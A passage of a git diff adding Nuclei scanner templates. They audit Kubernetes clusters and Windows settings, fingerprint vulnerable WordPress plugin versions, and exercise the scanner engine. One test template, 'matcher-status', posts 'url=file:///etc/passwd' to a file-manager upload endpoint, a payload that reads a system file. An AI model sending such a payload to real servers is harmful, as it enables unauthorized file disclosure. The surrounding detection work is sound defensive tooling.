digest: 4a0a00473045022100f45040f69d006ec672d4f4c04146b729cb7c5abcba703a8bbaa2da551013400202204e9b59dbad6d6e89badbb11aa795afa27f33eea1f026085e5f926675ac6cea68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-netpol-egress-rules.yaml b/poc/other/k8s-netpol-egress-rules.yaml new file mode 100644 index 0000000000..511c578f9f --- /dev/null +++ b/poc/other/k8s-netpol-egress-rules.yaml @@ -0,0 +1,48 @@ +id: k8s-netpol-egress-rules + +info: + name: Network policies define egress rules + author: princechaddha + severity: medium + description: Checks for network policies in Kubernetes that do not define egress rules, which can leave the network exposed to external threats. + impact: | + Lack of egress rules in network policies can result in unrestricted outbound network traffic, which may allow data exfiltration or unauthorized access to external services. + remediation: Define egress rules in all network policies to control outbound traffic from your Kubernetes pods, thereby reducing security risks. + reference: + - https://kubernetes.io/docs/concepts/services-networking/network-policies/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,devsecops,k8s,k8s-cluster-security +flow: | + code(1); + for (let policy of template.items) { + set("policy", policy) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get networkpolicies --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {policy: .metadata.name, egress: .spec.egress}' + +javascript: + - code: | + let policyData = JSON.parse(template.policy); + if (!policyData.egress || policyData.egress.length === 0) { + let result = (`Network policy '${policyData.policy}' does not define egress rules.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100cab8502b8046e7ecf04c896fd8367a118f6fa5f4a4b29b06f90a31e4c7e2bc910220761d406117dce7f3116e5426ad24d79d82a1e9e6161fa944fa8195c498144eda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-netpol-namespace.yaml b/poc/other/k8s-netpol-namespace.yaml new file mode 100644 index 0000000000..9b23910f44 --- /dev/null +++ b/poc/other/k8s-netpol-namespace.yaml @@ -0,0 +1,49 @@ +id: k8s-netpol-namespace + +info: + name: Network Policies specify namespace + author: princechaddha + severity: medium + description: Checks for Kubernetes Network Policies that do not specify a namespace, which can lead to potential misconfigurations and security issues. + impact: | + Omitting the namespace in Network Policies can cause the policies to apply incorrectly, potentially exposing Kubernetes resources to unauthorized access. This poses a security risk by not isolating network traffic properly within the cluster. + remediation: | + Ensure that all Network Policies explicitly define a namespace to maintain proper network isolation and security boundaries. + reference: + - https://kubernetes.io/docs/concepts/services-networking/network-policies/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,devsecops,k8s,k8s-cluster-security +flow: | + code(1); + for (let policy of template.items) { + set("policy", policy) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get netpol --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {policy: .metadata.name, namespace: .metadata.namespace}' + +javascript: + - code: | + let policyData = JSON.parse(template.policy); + if (!policyData.namespace) { + let result = (`Network Policy '${policyData.policy}' does not specify a namespace.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100a7a99b20e705b40f456f020120dbdc38203e9c7f83d53b71bbc0af6797ee66260221009031e85d86065e75668a3ec1dfeb488792ceb00272ad63592f819e073d410d3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-network-ingress-rules.yaml b/poc/other/k8s-network-ingress-rules.yaml new file mode 100644 index 0000000000..749a61ba54 --- /dev/null +++ b/poc/other/k8s-network-ingress-rules.yaml @@ -0,0 +1,49 @@ +id: k8s-network-ingress-rules + +info: + name: Define network ingress rules + author: princechaddha + severity: medium + description: Checks if Kubernetes network policies define specific ingress rules, which can help secure network communication within the cluster. + impact: | + Without specific ingress rules defined in network policies, unintended traffic may access pods within the Kubernetes cluster, increasing the risk of malicious activity. + remediation: | + Define specific ingress rules in all network policies to control the flow of inbound traffic to pods, ensuring only authorized traffic can access cluster resources. + reference: + - https://kubernetes.io/docs/concepts/services-networking/network-policies/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,security,k8s,k8s-cluster-security +flow: | + code(1); + for (let policy of template.items) { + set("policy", policy) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get networkpolicies --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {policy: .metadata.name, ingress: .spec.ingress}' + +javascript: + - code: | + let policyData = JSON.parse(template.policy); + if (!policyData.ingress || policyData.ingress.length === 0) { + let result = `Network policy '${policyData.policy}' does not define any ingress rules.`; + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100d225b4ed37ec5deb1b364b52b2db205bffb08d4c712940221be0d4a24c471f75022025482dd2adbab336f0b0dda3ed30272390ddd93780dd1cd41d6f6e1ceea8e096:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-readiness-probe-not-set.yaml b/poc/other/k8s-readiness-probe-not-set.yaml new file mode 100644 index 0000000000..995932c545 --- /dev/null +++ b/poc/other/k8s-readiness-probe-not-set.yaml @@ -0,0 +1,49 @@ +id: k8s-readiness-probe-not-set + +info: + name: Readiness Probes not set in Deployments + author: princechaddha + severity: medium + description: Checks for missing readiness probes in Kubernetes Deployments, which can lead to traffic being sent to unready containers + impact: | + Not configuring readiness probes in Kubernetes Deployments can result in the routing of traffic to containers that are not ready to handle requests, leading to potential downtime or degraded performance. + remediation: | + Define readiness probes in all containers within your Kubernetes Deployments to ensure that traffic is only routed to containers that are fully prepared to handle it. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment",deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (!deployment.spec.template.spec.containers.some(container => container.readinessProbe)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' lacks readiness probes.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a00483046022100c6a0f6296b693f56a70b84b9c521f990219221bf26e0b04d4a77c1bd1a39799a022100ecc56b0184771d6ce9e5620bc111adbcd68cb0b1c8de331956e3804dbe355685:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-readonly-fs.yaml b/poc/other/k8s-readonly-fs.yaml new file mode 100644 index 0000000000..a44ec8a363 --- /dev/null +++ b/poc/other/k8s-readonly-fs.yaml @@ -0,0 +1,48 @@ +id: k8s-readonly-fs + +info: + name: Enforce Read-Only Filesystem for Containers + author: princechaddha + severity: critical + description: Checks for containers that do not use a read-only filesystem, which can prevent malicious write operations at runtime + impact: | + Not using a read-only filesystem can expose containers to risks of malicious modifications at runtime, compromising the container's integrity and security. + remediation: Configure containers to use read-only filesystems where possible to enhance security and minimize risk of unauthorized data modification + reference: + - https://kubernetes.io/docs/concepts/storage/volumes/#mount-propagation + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,pods,k8s-cluster-security +flow: | + code(1); + for (let container of template.items) { + set("container", container) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[].spec.containers[]' + +javascript: + - code: | + container = JSON.parse(template.container); + if (!container.securityContext || container.securityContext.readOnlyRootFilesystem !== true) { + let result = (`Container '${container.name}' in pod '${container.metadata.name}' in namespace '${container.metadata.namespace}' does not use a read-only filesystem.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a004830460221008d29bff5a9ee8436cbd007be3e8ea7d9adde22d7ba56b153dad3a298636f379e022100857902d59b4dc2849a6618197e3062762c537f08d7ff3b8b5c38e030bd054c2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-readonly-rootfs.yaml b/poc/other/k8s-readonly-rootfs.yaml new file mode 100644 index 0000000000..4d739c753c --- /dev/null +++ b/poc/other/k8s-readonly-rootfs.yaml @@ -0,0 +1,51 @@ +id: k8s-readonly-rootfs + +info: + name: Pods with read-only root filesystem + author: princechaddha + severity: medium + description: Checks for pods and containers running with a read-only root filesystem to prevent modifications to the filesystem, enhancing security. + impact: | + Running containers with a read-only root filesystem ensures that applications are not able to write to the filesystem or modify existing content. This is a common security practice to prevent malicious changes. + remediation: | + Configure all pods and containers to have their root filesystem set to read-only mode. This can be achieved by setting the securityContext.readOnlyRootFilesystem parameter to true in the pod or container configuration. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#volumes-and-file-systems + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,devsecops,pods,k8s,k8s-cluster-security +flow: | + code(1); + for (let pod of template.items) { + set("pod", pod) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {pod: .metadata.name, containers: .spec.containers}' + +javascript: + - code: | + let podData = JSON.parse(template.pod); + podData.containers.forEach(container => { + if (container.securityContext && container.securityContext.readOnlyRootFilesystem !== true) { + let result = (`Container '${container.name}' in pod '${podData.pod}' is not running with a read-only root filesystem.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a004730450221008ab8295b6fd005e8c2e6adf415bc1afd2e4bf13da1309b9a1294010cd823ffb5022051261a124e174fb71b23d17a6e1cc22aad6096bfd8b57d0d73370257f852890d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-root-user-id.yaml b/poc/other/k8s-root-user-id.yaml new file mode 100644 index 0000000000..33f738f4d4 --- /dev/null +++ b/poc/other/k8s-root-user-id.yaml @@ -0,0 +1,50 @@ +id: k8s-root-user-id + +info: + name: Pods run with root user ID + author: princechaddha + severity: low + description: Checks for pods running with the user ID of the root user, increasing security risks. + impact: | + Running pods with the root user ID can allow malicious entities to gain unnecessary privileges, leading to potential compromises in the Kubernetes environment. + remediation: Configure pods to run with a non-root user ID by setting the 'securityContext' for each container and the pod itself. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,devsecops,pods,k8s,k8s-cluster-security +flow: | + code(1); + for (let pod of template.items) { + set("pod", pod) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[] | {pod: .metadata.name, containers: .spec.containers}' + +javascript: + - code: | + let podData = JSON.parse(template.pod); + podData.containers.forEach(container => { + if (container.securityContext && container.securityContext.runAsUser === 0) { + let result = (`Container '${container.name}' in pod '${podData.pod}' is running with root user ID.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a004730450220517a362ea6e79742e15c12dcf13275a23e3507c4a8c72f25f0a5620100cce53a022100d04b0c6d1bf0da1801dc9c6c9bea05701fa7e0e43570cd5b8ad9fb90294aa44c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/k8s-seccomp-profile-set.yaml b/poc/other/k8s-seccomp-profile-set.yaml new file mode 100644 index 0000000000..5b68f028c4 --- /dev/null +++ b/poc/other/k8s-seccomp-profile-set.yaml @@ -0,0 +1,54 @@ +id: k8s-seccomp-profile-set + +info: + name: Set appropriate seccomp profile + author: princechaddha + severity: medium + description: Checks if the seccomp profile is set to docker/default or runtime/default in Kubernetes Deployments. + impact: | + Using a default seccomp profile helps in reducing the attack surface of the container by limiting the syscalls containers can make, which can prevent certain types of exploits. + remediation: | + Ensure that all containers in Kubernetes Deployments have a seccomp profile of docker/default or runtime/default set in their security contexts. + reference: + - https://kubernetes.io/docs/tutorials/clusters/seccomp/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,devsecops,containers,k8s,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + deployment.spec.template.spec.containers.forEach(container => { + if (container.securityContext && container.securityContext.seccompProfile && + (container.securityContext.seccompProfile.type === 'RuntimeDefault' || container.securityContext.seccompProfile.type === 'DockerDefault')) { + // No action needed, configured properly + } else { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' does not have an appropriate seccomp profile set.`); + Export(result); + } + }); + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a0048304602210088b5afd30016fb2a61fd300e6a13bfa07252a0d4972eb11b70583499ab79a4c20221009aba524227d19ead61e2c75a7b2840b90b708f236054cedf8b3531fb4e3ee49b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/kata-plus-36c5b8e23edc73cc63396a6195be2274.yaml b/poc/other/kata-plus-36c5b8e23edc73cc63396a6195be2274.yaml new file mode 100644 index 0000000000..4a39bf1354 --- /dev/null +++ b/poc/other/kata-plus-36c5b8e23edc73cc63396a6195be2274.yaml @@ -0,0 +1,59 @@ +id: kata-plus-36c5b8e23edc73cc63396a6195be2274 + +info: + name: > + Kata Plus – Addons for Elementor – Widgets, Extensions and Templates <= 1.4.7 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/05c7267e-2e0c-48e9-bdaa-c8bc0b9ec8a6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/kata-plus/" + google-query: inurl:"/wp-content/plugins/kata-plus/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,kata-plus,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kata-plus/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kata-plus" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.7') \ No newline at end of file diff --git a/poc/other/learning-management-system-2928d4688fb415c9cbca95396899c99f.yaml b/poc/other/learning-management-system-2928d4688fb415c9cbca95396899c99f.yaml new file mode 100644 index 0000000000..5194f879a7 --- /dev/null +++ b/poc/other/learning-management-system-2928d4688fb415c9cbca95396899c99f.yaml @@ -0,0 +1,59 @@ +id: learning-management-system-2928d4688fb415c9cbca95396899c99f + +info: + name: > + Masteriyo LMS – eLearning and Online Course Builder for WordPress <= 1.13.3 - Authenticated (Student+) Stored Cross-Site Scripting via Ask a Question Functionality + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/575f103e-cfc7-4efd-a592-658a3e919671?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/learning-management-system/" + google-query: inurl:"/wp-content/plugins/learning-management-system/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,learning-management-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learning-management-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learning-management-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.13.3') \ No newline at end of file diff --git a/poc/other/learning-management-system-91dd199724129d4d681d2379143caddc.yaml b/poc/other/learning-management-system-91dd199724129d4d681d2379143caddc.yaml new file mode 100644 index 0000000000..947b657b02 --- /dev/null +++ b/poc/other/learning-management-system-91dd199724129d4d681d2379143caddc.yaml @@ -0,0 +1,59 @@ +id: learning-management-system-91dd199724129d4d681d2379143caddc + +info: + name: > + Masteriyo LMS – eLearning and Online Course Builder for WordPress <= 1.13.3 - Authenticated (Student+) Missing Authorization to Privilege Escalation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0c54166e-2af2-409d-8c67-9c07f2028543?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/learning-management-system/" + google-query: inurl:"/wp-content/plugins/learning-management-system/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,learning-management-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learning-management-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learning-management-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.13.3') \ No newline at end of file diff --git a/poc/other/llmnr-disabled.yaml b/poc/other/llmnr-disabled.yaml new file mode 100644 index 0000000000..36a0ce7e5f --- /dev/null +++ b/poc/other/llmnr-disabled.yaml @@ -0,0 +1,33 @@ +id: llmnr-disabled + +info: + name: LLMNR Disabled + author: princechaddha + severity: medium + description: Determine if LLMNR (Link-Local Multicast Name Resolution) is disabled. + impact: | + Enabling LLMNR can expose systems to man-in-the-middle attacks. + remediation: | + Disable LLMNR to reduce the risk of such attacks. + tags: windows,llmnr,network,security,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + $lmnrStatus = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' -Name 'EnableMulticast' -ErrorAction SilentlyContinue + if ($lmnrStatus -and $lmnrStatus.EnableMulticast -eq 0) {"LLMNR is correctly disabled"} else {"LLMNR is misconfigured or enabled by default"} + + matchers: + - type: word + words: + - "LLMNR is misconfigured or enabled by default" \ No newline at end of file diff --git a/poc/other/lm-hash-storage-enabled.yaml b/poc/other/lm-hash-storage-enabled.yaml new file mode 100644 index 0000000000..2f26f78477 --- /dev/null +++ b/poc/other/lm-hash-storage-enabled.yaml @@ -0,0 +1,32 @@ +id: lm-hash-storage-enabled + +info: + name: LM Hash Storage Enabled + author: princechaddha + severity: high + description: Checks if LM hashes are stored, which is an insecure practice. + impact: | + Storing LM hashes can lead to easier password cracking due to the weak nature of the LM hashing algorithm. + remediation: | + Disable LM hash storage by setting the NoLMHash registry key to prevent storing weak LM hashes. + tags: windows,hashing,security,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name 'NoLMHash' + + matchers: + - type: word + words: + - "NoLmHash : 0" diff --git a/poc/other/match-3.yaml b/poc/other/match-3.yaml new file mode 100644 index 0000000000..b2e23fb993 --- /dev/null +++ b/poc/other/match-3.yaml @@ -0,0 +1,16 @@ +id: basic-get-third + +info: + name: Basic 3rd GET Request + author: tovask + severity: info + +http: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + name: test-matcher-3 + words: + - "This is test matcher text" diff --git a/poc/other/matcher-status.yaml b/poc/other/matcher-status.yaml new file mode 100644 index 0000000000..4cfd0d1a0b --- /dev/null +++ b/poc/other/matcher-status.yaml @@ -0,0 +1,40 @@ +id: matcher-status + +info: + name: Test Matcher Status + author: pdteam + severity: critical + +variables: + username: test + password: admin + date: 2023-05-31 + +http: + - method: GET + path: + - "{{RootURL}}/login?username={{username}}&password={{password}}" + - "{{BaseURL}}/admin-pannel" + + - method: GET + path: + - "{{BaseURL}}/dashboard?date={{date}}" + - "{{BaseURL}}/signup" + + - method: POST + path: + - "{{BaseURL}}/filemanager/upload.php" + body: "fldr=&url=file:///etc/passwd" + + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "matcher status" + + - type: status + status: + - 200 diff --git a/poc/other/matcher-with-nested-and.yaml b/poc/other/matcher-with-nested-and.yaml new file mode 100644 index 0000000000..9e3b080859 --- /dev/null +++ b/poc/other/matcher-with-nested-and.yaml @@ -0,0 +1,18 @@ +id: file-matcher-with-nested-and + +info: + name: File Matcher With nested AND + author: pdteam + severity: info + tags: file + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "CCC" + - "DDD" + condition: and \ No newline at end of file diff --git a/poc/other/multi-request.yaml b/poc/other/multi-request.yaml new file mode 100644 index 0000000000..4ede5e37ea --- /dev/null +++ b/poc/other/multi-request.yaml @@ -0,0 +1,26 @@ +id: http-multi-request + +info: + name: http multi request template + author: pdteam + severity: info + description: template with multiple http request with combined logic + reference: https://example-reference-link + +# requestURI is reflected back as response body here +http: + - raw: + - | + GET /ping HTTP/1.1 + Host: {{Hostname}} + + - | + GET /pong HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'body_1 == "ping"' + - 'body_2 == "pong"' + condition: and \ No newline at end of file diff --git a/poc/other/multimatch-value-share-template.yaml b/poc/other/multimatch-value-share-template.yaml new file mode 100644 index 0000000000..fd66975e26 --- /dev/null +++ b/poc/other/multimatch-value-share-template.yaml @@ -0,0 +1,23 @@ +id: multimatch-value-share-template + +info: + name: MultiMatch Value Share Template + author: tovask + severity: info + +http: + - path: + - "{{BaseURL}}/path1?v=1" + - "{{BaseURL}}/path1?v=2" + matchers: + - type: word + name: test-matcher + words: + - "href" + extractors: + - type: regex + part: body + name: extracted + regex: + - 'href="(.*)"' + group: 1 diff --git a/poc/other/multimatch-value-share-workflow.yaml b/poc/other/multimatch-value-share-workflow.yaml new file mode 100644 index 0000000000..f197f28864 --- /dev/null +++ b/poc/other/multimatch-value-share-workflow.yaml @@ -0,0 +1,21 @@ +id: multimatch-value-share-workflow + +info: + name: MultiMatch Value Share Workflow + author: tovask + severity: info + description: Workflow to test value sharing when multiple matches occur in the extractor template + +workflows: + - template: workflow/multimatch-value-share-template.yaml + subtemplates: + - template: workflow/match-1.yaml + subtemplates: + - template: workflow/http-value-share-template-2.yaml + - template: workflow/multimatch-value-share-template.yaml + matchers: + - name: test-matcher + subtemplates: + - template: workflow/match-1.yaml + subtemplates: + - template: workflow/http-value-share-template-2.yaml diff --git a/poc/other/multiproto.yaml b/poc/other/multiproto.yaml new file mode 100644 index 0000000000..5e8754bde1 --- /dev/null +++ b/poc/other/multiproto.yaml @@ -0,0 +1,30 @@ +id: nuclei-multi-protocol + +info: + name: multi protocol support + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" # dns request + type: cname + +ssl: + - address: "{{Hostname}}" # ssl request + +http: + - method: GET + path: + - "{{BaseURL}}" # http request + + headers: + Host: "{{ssl_subject_cn}}" # host extracted from ssl request + Metadata: "{{ssl_cipher}}" + + matchers: + - type: dsl + dsl: + # - contains(http_body,'File not found') # check for http string + - http_status_code == 404 + - contains(dns_cname, 'github.io') # check for cname + condition: and \ No newline at end of file diff --git a/poc/other/multiprotocol-value-share-template.yaml b/poc/other/multiprotocol-value-share-template.yaml new file mode 100644 index 0000000000..41a2469191 --- /dev/null +++ b/poc/other/multiprotocol-value-share-template.yaml @@ -0,0 +1,22 @@ +id: multiprotocol-value-sharing-template + +info: + name: MultiProtocol Value Sharing Template + author: tovask + severity: info + +dns: + - name: "{{extracted}}" + type: PTR + matchers: + - type: word + words: + - "blog.projectdiscovery.io" + +http: + - path: + - "{{BaseURL}}/path2?extracted={{extracted}}" + matchers: + - type: word + words: + - "blog.projectdiscovery.io" diff --git a/poc/other/multiprotodynamic.yaml b/poc/other/multiprotodynamic.yaml new file mode 100644 index 0000000000..2bd3113488 --- /dev/null +++ b/poc/other/multiprotodynamic.yaml @@ -0,0 +1,29 @@ +id: dns-http-dynamic-values + +info: + name: multi protocol request with dynamic values + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" # DNS Request + type: cname + + extractors: + - type: dsl + name: blogid + dsl: + - trim_suffix(cname,'.ghost.io') + internal: true + +http: + - method: GET # http request + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - contains(body,'ProjectDiscovery.io') # check for http string + - blogid == 'projectdiscovery' # check for cname (extracted information from dns response) + condition: and \ No newline at end of file diff --git a/poc/other/multiprotowithprefix.yaml b/poc/other/multiprotowithprefix.yaml new file mode 100644 index 0000000000..61dc410aed --- /dev/null +++ b/poc/other/multiprotowithprefix.yaml @@ -0,0 +1,26 @@ +id: dns-http-proto-prefix + +info: + name: multi protocol request with dynamic values + author: pdteam + severity: info + +dns: + - name: "{{FQDN}}" # DNS Request + type: cname + +ssl: + - address: "{{Hostname}}" # ssl request + +http: + - method: GET # http request + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - contains(http_body,'ProjectDiscovery.io') # check for http string + - trim_suffix(dns_cname,'.ghost.io') == 'projectdiscovery' # check for cname (extracted information from dns response) + - ssl_subject_cn == 'blog.projectdiscovery.io' + condition: and \ No newline at end of file diff --git a/poc/other/net-multi-step.yaml b/poc/other/net-multi-step.yaml new file mode 100644 index 0000000000..0d638fa553 --- /dev/null +++ b/poc/other/net-multi-step.yaml @@ -0,0 +1,32 @@ +id: network-multi-step +info: + name: network multi-step + author: tarunKoyalwar + severity: high + description: | + Network multi-step template for testing + + +javascript: + - code: | + var m = require("nuclei/net"); + var conn = m.Open("tcp",address); + conn.SetTimeout(timeout); // optional timeout + conn.Send("FIRST") + conn.RecvString(4) // READ 4 bytes i.e PING + conn.Send("SECOND") + conn.RecvString(4) // READ 4 bytes i.e PONG + conn.RecvString(6) // READ 6 bytes i.e NUCLEI + + args: + address: "{{Host}}:{{Port}}" + Host: "{{Host}}" + Port: 5431 + timeout: 3 # in sec + + matchers: + - type: dsl + dsl: + - success == true + - response == "NUCLEI" + condition: and diff --git a/poc/other/netbios-disabled.yaml b/poc/other/netbios-disabled.yaml new file mode 100644 index 0000000000..497747f724 --- /dev/null +++ b/poc/other/netbios-disabled.yaml @@ -0,0 +1,33 @@ +id: netbios-disabled + +info: + name: NetBIOS Disabled + author: princechaddha + severity: medium + description: Determine if NetBIOS over TCP/IP is disabled on all network adapters. + impact: | + Enabling NetBIOS can expose systems to network-related attacks such as traffic interception and spoofing. + remediation: | + Disable NetBIOS on all network adapters to mitigate potential security risks. + tags: windows,netbios,network,security,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + $netbiosStatus = Get-WmiObject Win32_NetworkAdapterConfiguration | Where-Object { $_."TCP/IPNetBIOSOptions" -ne 2 } + if ($netbiosStatus) {"NetBIOS is misconfigured or enabled"} else {"NetBIOS is correctly disabled"} + + matchers: + - type: word + words: + - "NetBIOS is misconfigured or enabled" diff --git a/poc/other/network-discovery-public-enabled.yaml b/poc/other/network-discovery-public-enabled.yaml new file mode 100644 index 0000000000..b6a5d385e5 --- /dev/null +++ b/poc/other/network-discovery-public-enabled.yaml @@ -0,0 +1,32 @@ +id: network-discovery-public-disabled + +info: + name: Network Discovery Disabled on Public Networks + author: princechaddha + severity: medium + description: Checks if network discovery is disabled on all public networks. + impact: | + Disabling network discovery on public networks reduces the system's visibility and minimizes the attack surface, preventing potential unauthorized access. + remediation: | + Ensure network discovery remains disabled on public networks to maintain secure network configurations. + tags: network,code,windows-audit + +self-contained: true + +code: + - pre-condition: | + IsWindows(); + engine: + - powershell + - powershell.exe + args: + - -ExecutionPolicy + - Bypass + pattern: "*.ps1" + source: | + if (-not (Get-NetConnectionProfile | Where-Object { $_.NetworkCategory -eq 'Public' -and $_.NetworkDiscovery -eq 'Discoverable' })) { "Network Discovery is disabled on all Public networks" } + + matchers: + - type: word + words: + - "Network Discovery is disabled on all Public networks" \ No newline at end of file diff --git a/poc/other/network-port.yaml b/poc/other/network-port.yaml new file mode 100644 index 0000000000..c1ebdfdc96 --- /dev/null +++ b/poc/other/network-port.yaml @@ -0,0 +1,21 @@ +id: network-port-example + +info: + name: Example Template with Network Port + author: pdteam + severity: high + description: This is an updated description for the network port example. + reference: https://updated-reference-link + +tcp: + - host: + - "{{Hostname}}" + port: 23846 + inputs: + - data: "PING\r\n" + read-size: 4 + matchers: + - type: word + part: data + words: + - "PONG" diff --git a/poc/other/newsletters-lite-e4e61a63407c312b8137011c7ea6ce20.yaml b/poc/other/newsletters-lite-e4e61a63407c312b8137011c7ea6ce20.yaml new file mode 100644 index 0000000000..eedde5e278 --- /dev/null +++ b/poc/other/newsletters-lite-e4e61a63407c312b8137011c7ea6ce20.yaml @@ -0,0 +1,59 @@ +id: newsletters-lite-e4e61a63407c312b8137011c7ea6ce20 + +info: + name: > + Newsletters <= 4.9.9.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via newsletters_video Shortcode + author: topscoder + severity: low + description: > + + 